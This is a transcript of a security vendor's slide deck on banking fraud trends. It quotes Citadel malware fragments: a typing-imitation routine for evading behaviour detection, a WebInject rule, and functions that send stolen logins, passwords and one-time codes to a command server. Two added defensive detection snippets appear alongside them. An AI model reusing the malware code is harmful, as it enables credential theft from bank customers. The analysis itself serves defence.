online fraud: threats & trends - ibm › ru › events › presentations › cloud13 ›...

Online Fraud: Threats & Trends Ziv Cohen Director, EMEA Sales

Post on 26-Jun-2020

TRANSCRIPT

Page 1

Online Fraud: Threats & Trends

Ziv Cohen

Director, EMEA Sales

Page 2

Trusteer Confidential 2012 ©

Criminals Attack the Weak Link With Malware

Customer Accounts

Cyber Criminals

Difficult

Easy

Easy

Retail/Business Customer

Page 3

Trusteer Confidential 2013 ©

Protect Your Investment

Two emerging trends for malware:

Back to the basics tactics: reviving old techniques to bypass security solutions

Malware security: investing in malware protection from:

- Malware detection systems

- Anomaly detection systems

- Behavior profiling systems

- Device ID solutions

- And more…

Cybercrime forum trends – more services that help outsource technical aspects of fraud

Page 4

Evading Detection (Wrapper)

Page 5

Evading Detection

Page 6

Undetectable to AVs

Page 7

Undetectable to AVs

Page 8

Bypassing Device ID (RDP)

Notification

Login

Injection

Page 9

Bypassing Device ID (RDP)

RDP

Transaction

Page 10

Bypassing Device ID

Page 11

Behavior Anomaly Evasion

slow_fill = function(id, text) {
    var i = 1;
    beepInput(id);
    // Write the value one character at a time, every 200 ms, to imitate typing.
    var thread = setInterval(function() {
        id.value = text.substr(0, i);
        i++;
        if (i == text.length + 1) {
            clearInterval(thread);
            deleteHelpMessage();
        }
    }, 200);
}
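A detection-side counterpart, added here as an example and not taken from the slides: the snippet above sets the field value on a fixed 200 ms timer and never produces keyboard events, so a page can flag fields whose value grows without keystrokes or at a near-constant cadence. The event record shape, the function name and the thresholds are assumptions.

```javascript
// Added example (not from the slides). Record shape, names and thresholds are assumptions.
// events: chronological records for one field, { type: 'key' | 'change', t: <ms> }
//   'key'    = a keydown event the page saw on the field
//   'change' = the page observed the field's value length change (e.g. by polling)
function assessFieldFill(events, { minChanges = 4, maxCv = 0.1 } = {}) {
  const keys = events.filter((e) => e.type === 'key').length;
  const times = events.filter((e) => e.type === 'change').map((e) => e.t);
  const reasons = [];
  // A single jump (paste, password-manager autofill) is not judged here.
  if (times.length < minChanges) return { suspicious: false, reasons, cv: null };
  if (keys === 0) reasons.push('value-grew-without-keystrokes');
  const gaps = times.slice(1).map((t, i) => t - times[i]);
  const mean = gaps.reduce((a, b) => a + b, 0) / gaps.length;
  const variance = gaps.reduce((a, g) => a + (g - mean) ** 2, 0) / gaps.length;
  // Coefficient of variation: timer-driven fills are near 0, human typing is not.
  const cv = mean > 0 ? Math.sqrt(variance) / mean : 0;
  if (cv < maxCv) reasons.push('constant-cadence');
  return { suspicious: reasons.length > 0, reasons, cv };
}

// Constructed traces (ms since the field received focus).
const SCRIPTED_TRACE = [200, 401, 600, 802, 1000, 1201].map((t) => ({ type: 'change', t }));
const HUMAN_TRACE = [0, 130, 410, 520, 980, 1100].flatMap((t) => [
  { type: 'key', t },
  { type: 'change', t: t + 1 },
]);

console.log(assessFieldFill(SCRIPTED_TRACE).reasons);
console.log(assessFieldFill(HUMAN_TRACE).suspicious);
```

Both signals are heuristics: treat a hit as one input to a risk score rather than a verdict, since assistive software can also fill fields without keystrokes.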

Page 12

Russian Banks Targeted by Malware

The attacker:

Citadel – a descendant of Zeus

MITB functionality

The targets:

VTB24 (/WebNew/login.aspx)

Russian Standard Bank (rsb.ru)

Avangard Bank (avangard.ru)

The method:

Steal credentials

Steal OTPs

HTML Injection

Real time victim-to-cybercriminal communications

Page 13

Example of attack flow

Capture credentials in real time

The malware checks the credentials validity

Communicate with the user

Credentials are sent to the C&C in real time via Jabber

Cybercriminal logs in using the credentials, after pausing the victim

<WebInject>
  <Before><![CDATA[<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"]]></Before>
  <After><![CDATA[]]></After>
  <Data><![CDATA[ onkeypress="if(event.keyCode == 13) return false;"]]></Data>
</WebInject>

function Check() {
    if (login.value.length > 3 && pass.value.length > 3) {
        write_c('login', login.value, 3);
        write_c('pass', pass.value, 3);
        check_block();
    }
}

Пожалуйста , ожидайте . Происходит Авторизация! ("Please wait. Authorization is in progress!")

function KnockToAdmin() {
    var link = log_link + "?log=" + read_c('login') + "&pass=" + read_c('pass') + "&tan=" + tan.value;
    GetDataACD_knock_to_admin(link);
}

function SendMsg(msg) {
    var link = jabb_link + '?log=' + msg;
    GetDataACD_sendmsg(link);
}

function WaitForBlock() {
    var link = admin_logs + read_c('login') + '/block.me';
    GetDataACD_WaitForBlock(link);
}

function WaitForNextCode() {
    var link = admin_logs + read_c('login') + '/kod.2';
    GetDataACD_WaitForNextCode(link);
}

function WaitForFreeUse() {
    var link = admin_logs + read_c('login') + '/free.use';
    GetDataACD_WaitForFreeUse(link);
}

function OnLoadACD_check_block() {
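A defender's view of the WebInject rule above, added here as an example and not taken from the slides: the rule splices an `onkeypress` handler into the password input, so comparing the tag the server sent with the tag the browser reports exposes the added attribute. The function names, the `data-` ignore list and the closing `>` on the sample tags are assumptions.

```javascript
// Added example (not from the slides). Function names and the ignore list are assumptions.
// Parse the attributes of one HTML start tag into a Map keyed by lower-cased name.
function parseAttributes(tag) {
  const attrs = new Map();
  const body = tag.replace(/^<\s*[\w-]+/, '').replace(/\/?>\s*$/, '');
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs.set(m[1].toLowerCase(), m[2] || m[3] || m[4] || '');
  }
  return attrs;
}

// Compare the tag the server sent with the tag the browser reports back.
function findInjectedAttributes(servedTag, renderedTag, ignorePrefixes = ['data-']) {
  const served = parseAttributes(servedTag);
  const findings = [];
  for (const [name, value] of parseAttributes(renderedTag)) {
    if (ignorePrefixes.some((p) => name.startsWith(p))) continue;
    if (!served.has(name)) {
      const kind = name.startsWith('on') ? 'added-event-handler' : 'added-attribute';
      findings.push({ name, value, kind });
    } else if (served.get(name) !== value) {
      findings.push({ name, value, kind: 'changed-value' });
    }
  }
  return findings;
}

// Served tag: the slide's <Before> pattern, closed with '>' (the closing is an assumption).
const SERVED_TAG =
  '<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text">';
// Rendered tag: the same tag with the slide's <Data> payload spliced in.
const RENDERED_TAG =
  '<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"' +
  ' onkeypress="if(event.keyCode == 13) return false;">';

console.log(findInjectedAttributes(SERVED_TAG, RENDERED_TAG));
```

Attributes that the site's own scripts add at runtime belong in the served baseline or the ignore list; otherwise they show up as findings.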

Page 14

Fraud as a Service An Identity is Born

Page 15

Fraud as a Service Create A New Account

Selling bank account packages:
• Bank account information + ATM card
• Online banking credentials
• Official documents (including passports)
• Price: 12,000 Ruble (~$360)
Also offering a cashout service for a 5% fee

Page 16

Fraud as a Service

"Will buy a Corporate identity in one of the following countries" A corporate identity is an identity, online or real, which is authorized to perform changes and transfers in a corporate bank account.

I'm interested in credentials. Can be mixed countries, with United Arab Emirates, also interested in Poland, Italy, Netherlands

Page 17

Too Lazy?

Page 18

Security Silos FAIL!

Page 19

Holistic Approach for Cybercrime

WWW

Phishing and Malware Fraud

Advanced Threats (Employees)

Online/Mobile Banking

Money, Intellectual Property, Business Data

Account Takeover, New Account Fraud

Mobile Fraud Risk

Page 20

Trusteer Cybercrime Prevention Architecture

Compact software agent that prevents malware and Phishing attacks

Endpoint solutions for detecting malware, jailbreak, and other mobile risk factors

Out-of-Band Authentication

100% accurate clientless detection of active MitB malware on users’ devices

Conclusive criminal access detection by correlating device fingerprint and account compromise history

Trusteer Rapport PC/Mac

Trusteer Mobile iOS, Android

Trusteer Pinpoint Malware Detection

Trusteer Pinpoint ATO Detection

Centralized Management, Alerting, Reporting

Page 21

Thank You